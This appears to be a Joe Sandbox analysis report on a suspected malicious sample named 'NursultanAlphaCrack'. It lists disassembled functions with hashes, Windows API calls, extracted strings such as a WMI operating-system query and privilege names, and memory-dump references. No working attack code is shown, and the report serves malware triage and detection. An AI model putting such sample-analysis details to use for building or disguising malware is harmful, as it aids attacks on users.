Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ac3674d80322d544375dacea9858a446e8aa4936f3d377684faaf0b85f20da
Instruction ID: a97586ab6c18e0cab1fe10c2e0c248da5ceb2f346f85d17d409ae1efa30b374a
Opcode Fuzzy Hash: 38ac3674d80322d544375dacea9858a446e8aa4936f3d377684faaf0b85f20da
Instruction Fuzzy Hash: 6F51D3315083D58FC712CF24C14496EBFE2AEAA714F5949ADF4D95B243C321DA4BCB62

Function 001D00B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8190f30e3b41f1fb02e10e803696b224ce67ce3cc582d9298cf52069185058be
Instruction ID: 56df6b3be24f6a877f634be832cc8ad20857fe8c2841e29483f1ff9398d8148e
Opcode Fuzzy Hash: 8190f30e3b41f1fb02e10e803696b224ce67ce3cc582d9298cf52069185058be
Instruction Fuzzy Hash: A451DFB1A087119FC748CF19D88065AF7E1FB88354F058A2EE899E3340D734E959CB9A

Function 001D3E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: 437934ca8d896543f1e9c418a552b028bba45e8924a64dc581bb14217a337869
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: C431F8B1A1474A8FCB18DF28C85166EBBE0FFA5304F50452EE495D7341C735EA0ACB92

Function 001CE2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 001CE30E

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

Part of subcall function 001D1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00201030,00000200,001CD928,00000000,?,00000050,00201030), ref: 001D1DC4

_strlen.LIBCMT ref: 001CE32F
SetDlgItemTextW.USER32(?,001FE274,?), ref: 001CE38F
GetWindowRect.USER32(?,?), ref: 001CE3C9
GetClientRect.USER32(?,?), ref: 001CE3D5
GetWindowLongW.USER32(?,000000F0), ref: 001CE475
GetWindowRect.USER32(?,?), ref: 001CE4A2
SetWindowTextW.USER32(?,?), ref: 001CE4DB
GetSystemMetrics.USER32(00000008), ref: 001CE4E3
GetWindow.USER32(?,00000005), ref: 001CE4EE
GetWindowRect.USER32(00000000,?), ref: 001CE51B
GetWindow.USER32(00000000,00000002), ref: 001CE58D

Strings

I=u, xrefs: 001CE4E3
CAPTION, xrefs: 001CE4BD
$%s:, xrefs: 001CE302
d, xrefs: 001CE3F5

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: I=u$$%s:$CAPTION$d
API String ID: 2407758923-1991495195
Opcode ID: aa4104d7f5c1a9ddb8ec5d53850e85bcd63a33e84f777988cb6fb863419caea3
Instruction ID: 4de5eb54d053f908d264c8eecbc0a9d0a01d609096d695662abe42c73abd4ff9
Opcode Fuzzy Hash: aa4104d7f5c1a9ddb8ec5d53850e85bcd63a33e84f777988cb6fb863419caea3
Instruction Fuzzy Hash: EC81AF72208341AFD710DFA8DC89F6BBBE9EB98714F04191DFA88E7250D734E9058B52

Function 001ECB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 001ECB66

Part of subcall function 001EC701: _free.LIBCMT ref: 001EC71E
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC730
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC742
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC754
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC766
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC778
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC78A
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC79C
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7AE
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7C0
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7D2
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7E4
Part of subcall function 001EC701: _free.LIBCMT ref: 001EC7F6

_free.LIBCMT ref: 001ECB5B

Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4

_free.LIBCMT ref: 001ECB7D
_free.LIBCMT ref: 001ECB92
_free.LIBCMT ref: 001ECB9D
_free.LIBCMT ref: 001ECBBF
_free.LIBCMT ref: 001ECBD2
_free.LIBCMT ref: 001ECBE0
_free.LIBCMT ref: 001ECBEB
_free.LIBCMT ref: 001ECC23
_free.LIBCMT ref: 001ECC2A
_free.LIBCMT ref: 001ECC47
_free.LIBCMT ref: 001ECC5F

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: f0e97545c674913c62498f19dc428f28f51ca012ec83b8dc6cec02931145fffa
Instruction ID: 0f5c53595d185faef3072003104be5c1a365ab0218d1aaeca4774aef882cdefb
Opcode Fuzzy Hash: f0e97545c674913c62498f19dc428f28f51ca012ec83b8dc6cec02931145fffa
Instruction Fuzzy Hash: 30314B31600A869FEB24AA7ADC46B5EB7E9BF20350F244429E55CD7192DF31AC81CB90

Function 001D9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001D9736
_wcslen.LIBCMT ref: 001D97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 001D97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001D9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001D982D

Strings

</html>, xrefs: 001D97B7
utf-8"></head>, xrefs: 001D976B
<html>, xrefs: 001D9755, 001D978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 001D9760

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 2fd7ca8df65806e633d2b067e38436f26791490ba8d133839835bc3c19c3072d
Instruction ID: 05e8ef85fd62d39ca3cb0e5f86606d585061289b780bd3c62c635cf731aa557a
Opcode Fuzzy Hash: 2fd7ca8df65806e633d2b067e38436f26791490ba8d133839835bc3c19c3072d
Instruction Fuzzy Hash: 6B318A321087457BE725AF35AC06F6F779CDF62720F14011FF511972D2EB649A0483A5

Function 001DD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 001DD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 001DD6ED

Part of subcall function 001D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001CC116,00000000,.exe,?,?,00000800,?,?,?,001D8E3C), ref: 001D1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 001DD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001DD720
GetObjectW.GDI32(00000000,00000018,?), ref: 001DD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001DD75D
DeleteObject.GDI32(00000000), ref: 001DD764
GetWindow.USER32(00000000,00000002), ref: 001DD76D

Strings

STATIC, xrefs: 001DD6F3

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 8099ee8071f0a40eaaf67141bedf34313ba4543eaad72112a002240313454aac
Instruction ID: f927af129984c49472b4e2f9667923cc3e74bfa0ecafcf3bdb84910c30998322
Opcode Fuzzy Hash: 8099ee8071f0a40eaaf67141bedf34313ba4543eaad72112a002240313454aac
Instruction Fuzzy Hash: C61103726403107BE631EBB4BC4EFAF765CAF54715F004122FA41E6291DB68CF0686B5

Function 001E96F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001E9705

Part of subcall function 001E8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34), ref: 001E8DE2
Part of subcall function 001E8DCC: GetLastError.KERNEL32(001F3A34,?,001EC896,001F3A34,00000000,001F3A34,00000000,?,001EC8BD,001F3A34,00000007,001F3A34,?,001ECCBA,001F3A34,001F3A34), ref: 001E8DF4

_free.LIBCMT ref: 001E9711
_free.LIBCMT ref: 001E971C
_free.LIBCMT ref: 001E9727
_free.LIBCMT ref: 001E9732
_free.LIBCMT ref: 001E973D
_free.LIBCMT ref: 001E9748
_free.LIBCMT ref: 001E9753
_free.LIBCMT ref: 001E975E
_free.LIBCMT ref: 001E976C

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24c051dfbbb22e874043866c60367f975650def6ec104c0df7e9965f994dac24
Instruction ID: a3f3d2268413804d3b3a0c3aad4c62399ae89436bbf9511afab47b0cf473c68e
Opcode Fuzzy Hash: 24c051dfbbb22e874043866c60367f975650def6ec104c0df7e9965f994dac24
Instruction Fuzzy Hash: 3611D276100549AFCB09EF96CC82CDD3BB5FF24350B0550A1FA088F262DF32EA509B84

Function 001E2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 001E2F50
___TypeMatch.LIBVCRUNTIME ref: 001E305E
_UnwindNestedFrames.LIBCMT ref: 001E31B0
CallUnexpected.LIBVCRUNTIME ref: 001E31CB
_abort.LIBCMT ref: 001E31D0

Strings

csm, xrefs: 001E2EDB
csm, xrefs: 001E2E6E
csm, xrefs: 001E2F87

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 1e61d5bc57a8d7ef8ff0a5d39356cadf12e013c8e9c807e0c2ab21168bf69511
Instruction ID: 47ddf199ffcc3bb7c1b7cc0bed8e579484507e0159dab3ce33b1039c73057f72
Opcode Fuzzy Hash: 1e61d5bc57a8d7ef8ff0a5d39356cadf12e013c8e9c807e0c2ab21168bf69511
Instruction Fuzzy Hash: B1B18D71800A89EFCF29DFA6C8999AEB7B9FF14310F144159F8216B212D731EA51CF91

Function 001C6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C6FAA
_wcslen.LIBCMT ref: 001C7013
_wcslen.LIBCMT ref: 001C7084

Part of subcall function 001C7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001C7AAB
Part of subcall function 001C7A9C: GetLastError.KERNEL32 ref: 001C7AF1
Part of subcall function 001C7A9C: CloseHandle.KERNEL32(?), ref: 001C7B00

Strings

UNC\, xrefs: 001C7051
SeCreateSymbolicLinkPrivilege, xrefs: 001C6FCC
SeRestorePrivilege, xrefs: 001C6FC2
\??\, xrefs: 001C702B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 0b21fc57f55e5540a774dbad9ac5e6daa9bbe742fd7a080a7c5681d326c98398
Instruction ID: d7c9b6d9a8e522ce0386b380ac55d673853555ddb515d1556769fab03184c7a8
Opcode Fuzzy Hash: 0b21fc57f55e5540a774dbad9ac5e6daa9bbe742fd7a080a7c5681d326c98398
Instruction Fuzzy Hash: D541D7B1D087887AEB21E7709C46FEE776C6F35344F040459FA55A71C2D7B4EA448B21

Function 001DB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001C1316: GetDlgItem.USER32(00000000,00003021), ref: 001C135A
Part of subcall function 001C1316: SetWindowTextW.USER32(00000000,001F35F4), ref: 001C1370

EndDialog.USER32(?,00000001), ref: 001DB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 001DB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001DB650
SetWindowTextW.USER32(?,?), ref: 001DB661
GetDlgItem.USER32(?,00000065), ref: 001DB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001DB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001DB694

Strings

LICENSEDLG, xrefs: 001DB5D4

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: fc9ea7676d05eec713167e17d8669fd759c277143e07ca48e014044d89ac98fd
Instruction ID: 4fba6f6f379ff3ccb4ba92b6df19c70d86ef77725cc578f24a1528be811a049b
Opcode Fuzzy Hash: fc9ea7676d05eec713167e17d8669fd759c277143e07ca48e014044d89ac98fd
Instruction Fuzzy Hash: BC21B432208214FBD2219FA6FD8DF7B3B7DEB56B41F024016FA05922A0CF56DA029671

Function 001DFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,CA70C7D0,00000001,00000000,00000000,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFE14
SysAllocString.OLEAUT32(00000000), ref: 001DFE1F
_com_issue_error.COMSUPP ref: 001DFE48
_com_issue_error.COMSUPP ref: 001DFE52
GetLastError.KERNEL32(80070057,CA70C7D0,00000001,00000000,00000000,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFE57
_com_issue_error.COMSUPP ref: 001DFE6A
GetLastError.KERNEL32(00000000,?,?,001CAF6C,ROOT\CIMV2), ref: 001DFE80
_com_issue_error.COMSUPP ref: 001DFE93

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: ba7354d4c061ea6de4211313a14ef54432d1b583ef615aa40e1002548aded977
Instruction ID: d3b2b3fdc9d79bd9b6f83bfe52342656f2998c59b25609bfb7f3d7fc52bec348
Opcode Fuzzy Hash: ba7354d4c061ea6de4211313a14ef54432d1b583ef615aa40e1002548aded977
Instruction Fuzzy Hash: 22410871A00219AFCB109FA8CC45BAEBBA8EF44710F14423FF916E7391D7349A41C7A4

Function 001CAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001CAF29

Strings

Name, xrefs: 001CB0B0
ROOT\CIMV2, xrefs: 001CAF5C
SELECT * FROM Win32_OperatingSystem, xrefs: 001CAFCA
Windows 10, xrefs: 001CB0C2
WQL, xrefs: 001CAFDC

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 5f94c2ba5cd16d22c4e9f92e26089b9e1f50e0a379ef7d047a1cb1166a03727c
Instruction ID: 3d77c4c9ed07eb4fa68db5b916f874b3b8514ab9144efdb450b4092f9400d185
Opcode Fuzzy Hash: 5f94c2ba5cd16d22c4e9f92e26089b9e1f50e0a379ef7d047a1cb1166a03727c
Instruction Fuzzy Hash: 5A713770A00219AFDB15DFA4C895EBEBBB9FF58714B14015DE512E72A0CB30AE42CB60

Function 001C9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001C93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001C93C9

Part of subcall function 001CC29A: _wcslen.LIBCMT ref: 001CC2A2

Part of subcall function 001D1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001CC116,00000000,.exe,?,?,00000800,?,?,?,001D8E3C), ref: 001D1FD1

_swprintf.LIBCMT ref: 001C9465

Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5

MoveFileW.KERNEL32(?,?), ref: 001C94D4
MoveFileW.KERNEL32(?,?), ref: 001C9514

Strings

rtmp%d, xrefs: 001C944E

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 5849ff60792b66af91a4ab93b3aa74df2a8f7fb61630908c98d9722e758ff8f8
Instruction ID: b68bd7502e9fdc21607f03bd6b2fee7b1584f13a7da02e62946a2428097d07fb
Opcode Fuzzy Hash: 5849ff60792b66af91a4ab93b3aa74df2a8f7fb61630908c98d9722e758ff8f8
Instruction Fuzzy Hash: 204143B190025866DF21EBA0CD59FEE737CAF75740F0048AAB649E3151DB38DB89CB60

Function 001D1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 001D122E

Part of subcall function 001CB146: GetVersionExW.KERNEL32(?), ref: 001CB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 001D1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 001D1263
